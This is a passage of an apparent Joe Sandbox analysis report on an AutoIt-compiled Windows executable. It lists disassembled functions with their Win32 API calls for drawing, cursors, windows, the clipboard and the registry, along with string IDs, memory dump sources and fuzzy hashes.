                                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                                      • SelectObject.GDI32(?,?), ref: 00441874
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                      • DeleteObject.GDI32(?), ref: 004418D5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                      • FillRect.USER32(?,?,?), ref: 00441970
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                      • String ID:
                                                      • API String ID: 69173610-0
                                                      • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                      • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                      Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004590F2
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                      Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-3360698832
                                                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                      Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                      • SetCursor.USER32(00000000), ref: 0043075B
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                      • SetCursor.USER32(00000000), ref: 00430773
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                      • SetCursor.USER32(00000000), ref: 0043078B
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                      • SetCursor.USER32(00000000), ref: 004307A3
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                      • SetCursor.USER32(00000000), ref: 004307BB
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                      • SetCursor.USER32(00000000), ref: 004307D3
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                      • SetCursor.USER32(00000000), ref: 004307EB
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                      • SetCursor.USER32(00000000), ref: 00430803
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                      • SetCursor.USER32(00000000), ref: 0043081B
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                      • SetCursor.USER32(00000000), ref: 00430833
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                      • SetCursor.USER32(00000000), ref: 0043084B
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                      • SetCursor.USER32(00000000), ref: 00430863
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                      • SetCursor.USER32(00000000), ref: 0043087B
                                                      • SetCursor.USER32(00000000), ref: 00430887
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                      • SetCursor.USER32(00000000), ref: 0043089F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load
                                                      • String ID:
                                                      • API String ID: 1675784387-0
                                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                      Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                      • GetSysColor.USER32(00000012), ref: 00430933
                                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                                      • GetSysColor.USER32(00000011), ref: 00430979
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1582027408-0
                                                      • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                      • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                      Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 3217815495-966354055
                                                      • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                      • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                      Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 004566AE
                                                      • GetDesktopWindow.USER32 ref: 004566C3
                                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                      • DestroyWindow.USER32(?), ref: 00456746
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                      • CopyRect.USER32(?,?), ref: 004568BE
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                      • String ID: ($,$tooltips_class32
                                                      • API String ID: 225202481-3320066284
                                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                      Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                      • String ID:
                                                      • API String ID: 15083398-0
                                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                      Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                      • String ID: @$AutoIt v3 GUI
                                                      • API String ID: 867697134-3359773793
                                                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                      Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll$__wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                      • API String ID: 790654849-32604322
                                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
